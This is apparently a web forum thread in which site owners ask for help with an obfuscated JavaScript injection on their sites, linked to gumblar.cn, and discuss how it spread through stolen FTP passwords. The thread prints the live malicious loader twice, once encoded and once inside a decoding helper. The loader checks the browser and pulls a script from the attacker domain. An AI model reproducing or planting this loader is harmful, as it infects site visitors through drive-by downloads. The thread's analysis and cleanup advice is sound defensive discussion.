I got this code on some of my sites. I don't know how it got there, or whatever its doing. Need some help here... Here's the code: <script language=javascript><!-- (function(t){eval(unescape(('var>20>61>3d>22Sc>72i pt>45ngine>22>2cb>3d>22Ve>72s>69on>28)+>22>2cj>3d> 22>22>2cu>3dn>61vigator>2e>75se>72Agent>3b>69>66>2 8>28>75>2e>69>6ed>65xOf>28>22Win>22)>3e0)>26>26(u> 2eindexO>66>28>22>4eT>20>36>22)>3c0>29>26>26(d>6fc umen>74>2ecook>69e>2eind>65>78>4ff(>22miek>3d1>22) >3c0)>26>26(>74>79p>65>6ff(>7a>72vzts)>21>3d>74yp> 65>6ff(>22A>22))>29>7b>7a>72vzts>3d>22A>22>3b>65va >6c(>22i>66(>77indo>77>2e>22+>61+>22)>6a>3d>6a>2b> 22+a>2b>22Ma>6aor>22+>62+a>2b>22M>69nor>22+b+a>2b> 22Bui>6c>64>22+>62>2b>22j>3b>22)>3bdo>63ument>2ewr >69>74e(>22>3cs>63ript>20src>3d>2f>2fgumbla>72>2ec n>2frss>2f>3fid>3d>22+j+>22>3e>3c>5c>2f>73cript>3e >22)>3b>7d').replace(t,'%')))})(/>/g); --></script> And it has something to do with http://gumblar.cn - reported attack site!
First, delete the code from your site. Second, your server probably has a leak somewhere, is your software up to date?
the code is not visible on any php file the sites infected are hosted on different servers/hosts the ony thing they have in common is a ftp client. could that have caused this ? I'm really lost!
i assume your ftp does not allow anonymous logins so, it's probably an exploit within the script you were using, could be xss or some js
Use this function to be able to read the code function readCode(){ var makesense = 'var>20>61>3d>22Sc>72i pt>45ngine>22>2cb>3d>22Ve>72s>69on>28)+>22>2cj>3d> 22>22>2cu>3dn>61vigator>2e>75se>72Agent>3b>69>66>2 8>28>75>2e>69>6ed>65xOf>28>22Win>22)>3e0)>26>26(u> 2eindexO>66>28>22>4eT>20>36>22)>3c0>29>26>26(d>6fc umen>74>2ecook>69e>2eind>65>78>4ff(>22miek>3d1>22) >3c0)>26>26(>74>79p>65>6ff(>7a>72vzts)>21>3d>74yp> 65>6ff(>22A>22))>29>7b>7a>72vzts>3d>22A>22>3b>65va >6c(>22i>66(>77indo>77>2e>22+>61+>22)>6a>3d>6a>2b> 22+a>2b>22Ma>6aor>22+>62+a>2b>22M>69nor>22+b+a>2b> 22Bui>6c>64>22+>62>2b>22j>3b>22)>3bdo>63ument>2ewr >69>74e(>22>3cs>63ript>20src>3d>2f>2fgumbla>72>2ec n>2frss>2f>3fid>3d>22+j+>22>3e>3c>5c>2f>73cript>3e >22)>3b>7d'.replace(/>/g, '%'); var sense = unescape(makesense); alert(sense); } Code (markup): it looks like it is checking for IE and users on a version of windows that is not vista. If it finds that, it sends the user to the web site listed. After it gets to the site I assume that it is doing something not nice. I have pm'd you the code so you can see for yourself.
Your site might be also infected because your local PC have some virus which can grab stored passwords from your FTP client software and to do login to your sites saved there and upload there viruses.
Any word on a fix for this yet? It is hurting all of my sites as I remove it daily. Keeps coming back. I believe it is because I left my passwords in dreamweaver. I changed them but it was too late as they inject this script that comes back every 48 hours.